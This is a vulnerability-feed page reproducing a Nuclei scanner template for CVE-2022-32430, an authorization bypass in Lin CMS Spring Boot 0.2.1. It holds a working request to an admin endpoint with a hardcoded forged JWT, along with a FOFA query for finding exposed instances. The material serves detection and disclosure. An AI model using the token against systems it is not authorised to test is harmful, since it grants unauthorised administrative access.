Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-32430
HistoryApr 03, 2024 - 5:08 a.m.

Lin CMS Spring Boot - Default JWT Token

2024-04-0305:08:11
ProjectDiscovery
github.com
6
cve2022
lin cms
authorization bypass
access control

6.6 Medium

AI Score

Confidence

High

0.016 Low

EPSS

Percentile

87.4%

An access control issue in Lin CMS Spring Boot v0.2.1 allows attackers to access the backend information and functions within the application.
id: CVE-2022-32430

info:
  name: Lin CMS Spring Boot - Default JWT Token
  author: DhiyaneshDK
  severity: high
  description: |
    An access control issue in Lin CMS Spring Boot v0.2.1 allows attackers to access the backend information and functions within the application.
  reference:
    - https://github.com/TaleLin/lin-cms-spring-boot
    - https://web.archive.org/web/20220721190946/https://www.mesec.cn/archives/277
    - https://nvd.nist.gov/vuln/detail/CVE-2022-32430
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-32430
    epss-score: 0.00227
    epss-percentile: 0.60316
    cpe: cpe:2.3:a:talelin:lin-cms-spring-boot:0.2.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: talelin
    product: lin-cms-spring-boot
    fofa-query: body="心上无垢,林间有风"
  tags: cve,cve2022,lin-cms,auth-bypass

http:
  - method: GET
    path:
      - "{{BaseURL}}/cms/admin/group/all"
    headers:
      Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZGVudGl0eSI6MSwic2NvcGUiOiJsaW4iLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzUzMTkzNDc5fQ.SesmAnYN5QaHqSqllCInH0kvsMya5vHA1qPHuwCZ8N8

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"id":'
          - '"name":'
          - '"level":'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '<html'
          - '<body'
          - '<script'
        negative: true
# digest: 4a0a00473045022100bdeff498f1f612fac7529406701fa2c1f6c36e0a20d7c8938adf45c40af8e88402204ebb5a59a63fafab1d1db6752328c1c4b67009af43da014df47524912c3ca82b:922c64590222798bb761d5b6d8e72950

6.6 Medium

AI Score

Confidence

High

0.016 Low

EPSS

Percentile

87.4%

Related for NUCLEI:CVE-2022-32430